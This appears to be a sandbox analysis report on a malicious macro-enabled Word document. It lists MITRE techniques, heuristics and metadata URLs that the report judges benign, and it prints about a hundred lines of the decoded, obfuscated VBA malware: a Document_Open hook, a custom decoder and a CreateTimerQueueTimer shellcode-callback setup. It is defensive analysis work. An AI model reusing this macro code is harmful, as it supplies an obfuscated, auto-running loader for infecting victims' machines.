Verdict: MALICIOUS (Risk Score 142)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1071.001 Application Layer Protocol: Web Protocols
The sample contains a VBA macro with a Document_Open auto-execution handler, so the code runs as soon as the document is opened with macros enabled. The macro is obfuscated: identifiers are random dictionary words, every numeric constant is written as arithmetic on literals (for example `45 - 27 + 16711662`, which folds to 16711680 = 0xFF0000), and the control flow is padded with no-op calls to the financial function Pmt. The heuristics flag a GetObject call. The decoded source shown in the artifact preview also declares Kernel32!CreateTimerQueueTimer under the alias `decapitate`, reads a string out of a UserForm control (`unwelcome.hallucinogen.SelectedItem.Name`), un-shifts alternate characters by 4 and 3, decodes the result with a Base64-style table (4 input characters per 3 output bytes; 6-, 12- and 18-bit shifts; 0xFF0000, 0xFF00 and 0xFF masks), hands the buffer to `morder.malabo` (a routine outside the preview) and uses the returned address plus a fixed, bitness-dependent offset as the timer callback. That pattern is consistent with in-memory shellcode execution rather than a download; because `morder.malabo` is not shown, the allocation and copy step is inferred, not confirmed. The extracted URLs are XMP, RDF and Dublin Core namespace identifiers found in the document body (typical of metadata in an embedded image) and are not network indicators; the T1071.001 mapping therefore rests on the analyzer's attribution rather than on any URL reached from the macro. The combination of auto-execution, obfuscation and an aliased Win32 API import identifies a malicious document built for initial access via a spearphishing attachment.
Heuristics (5)
- VBA macros detected [medium] (3 related findings) OLE_VBA_MACROS: Document contains VBA macro code.
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro (runs automatically when the document is opened).
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call.
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All seven URLs below were found in document text (OLE body), none in the macro, and all are XMP, RDF or Dublin Core namespace identifiers, which is what an embedded image's metadata block looks like rather than a download location.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10816 bytes | 34e0862698f96ab89445ad5d10bf498d940412f6df28e95e972f5fc7068d9f13 |

Preview script (first 1,000 lines of the extracted script; the preview cuts off inside the Declare statement of module "soave"):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function biradial(articulately) As String
Dim allantoic(6962) As Byte
Dim baroque As Long
Dim chimakum As Long
Dim despumate() As Byte
Dim beanfeast As Long
Dim harem(63) As Long
Dim barbecue As Long
Dim atelier(63) As Long
Dim illdigested(63) As Long
seeing = 39 - 80 + 65321
aneurysmal = 9 - 112 + 65639
bumper = 7 - 40 + 4129
ectoderm = 45 - 27 + 16711662
Dim capella() As Byte
capella = VBA.StrConv(articulately, 128)
cooks = 5 + 32
Pmt 0, cooks, 7585, 47529, 8
copaiba = 7840 + 3
finem = vbKeyShift - 12
For unauthoritative = (1 - 1) To copaiba * 1
If unauthoritative Mod (6 - 4) = (3 - 3) Then
capella(unauthoritative) = capella(unauthoritative) - finem
Else
capella(unauthoritative) = capella(unauthoritative) - (finem - 1)
End If
Next unauthoritative
sympathectomy = 11 + 51
Pmt 0, sympathectomy, 25280, 57587, 6
uncertain = 107 - 100 - 7
prionace = 80 - 3 - 34
archegenesis = abolishment
For beanfeast = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
harem(beanfeast) = plebiscitum(beanfeast, (4 - 94 + 154), 30 + 5)
atelier(beanfeast) = plebiscitum(beanfeast, bumper, 30 + 5)
illdigested(beanfeast) = plebiscitum(beanfeast, (120 - 41 + 262065), 30 + 5)
Next beanfeast
breastfed = 39 + 9
Pmt 0, breastfed, 36651, 54834, 2
despumate = capella
grampositive = 18 + 59
Pmt 0, grampositive, 12329, 36386, 3
northwestward = 122 - 24 - 95
enfranchised = 36 - 122 + 88
For barbecue = 0 To copaiba
clay = despumate(barbecue)
belay = despumate(barbecue + 2)
baggala = atelier(archegenesis(despumate(barbecue + 1)))
cupronickel = harem(archegenesis(belay)) + _
archegenesis(despumate(barbecue + northwestward))
baroque = illdigested(archegenesis(clay)) + baggala + cupronickel
beanfeast = plebiscitum(baroque, ectoderm, 20 + 7)
allantoic(chimakum) = plebiscitum(beanfeast, aneurysmal, 10 + 7)
beanfeast = plebiscitum(baroque, seeing, 20 + 7)
allantoic(chimakum + 1) = plebiscitum(beanfeast, (15 - 23 + 264), 10 + 7)
allantoic(chimakum + enfranchised) = plebiscitum(baroque, (1 - 79 + 333), 20 + 7)
chimakum = chimakum + enfranchised + 1
barbecue = barbecue + 3
Next
biradial = allantoic
End Function
Function braze()
unwelcome.hallucinogen.Value = Day(#12/5/2013#)
Set aerobiotic = unwelcome.hallucinogen.SelectedItem
symmetry = 51 + 44
Pmt 0, symmetry, 19244, 48842, 8
whim = aerobiotic.Name
justly = 50 - 49 + 7843
crenulate = Right(whim, justly)
hipless = biradial(crenulate)
footwear = 40 + 48
Pmt 0, footwear, 13324, 17438, 6
#If (14 * 4 + 6) > (9 - 4 * 2) And (99 - 11 * 9) * 30 < (Win64) Then
Dim upbow As LongPtr
Dim seedtime As LongPtr
Dim ploy As LongPtr
Dim fumble As LongPtr
Dim pattern As LongPtr
ramshead = 118 - 128 + 2074
#End If
#If (14 * 4 + 6) > (9 - 4 * 2) And Not (99 - 11 * 9) * 30 < (Win64) Then
Dim seedtime As Long
Dim upbow As Long
Dim ploy As Long
Dim fumble As Long
Dim pattern As Long
ramshead = (14 - 25 + 792) + 3459
#End If
adaptability = 21 + 13
Pmt 0, adaptability, 2073, 45246, 2
melicoccus = 20 + 37
Pmt 0, melicoccus, 29396, 52316, 4
antibacterial = hipless
upbow = morder.malabo(antibacterial)
ploy = 102 - 7 - 95
seedtime = upbow + ramshead
fumble = 63 - 108 + 201572
pattern = 71 - 80 + 3509
balaenicipitidae = decapitate(fumble, _
ploy, seedtime, _
ploy, ploy, ploy, _
ploy)
bonnet = 59 + 1
Pmt 0, bonnet, 13549, 52182, 5
End Function
Private Sub Document_Open()
remissness = "mate"
braze
canaliculated = 9 + 19
Pmt 0, canaliculated, 36418, 18210, 5
End Sub
Attribute VB_Name = "soave"
' Es ist kalt und regungslos   (German: "It is cold and motionless")
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
' Die Nacht öffnet ihren Schoß   (German: "The night opens its womb")
' Ich weiß nicht wie du heißt   (German: "I do not know what your name is")
Public Declare Function decapitate _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (etiolate As ... (truncated)
```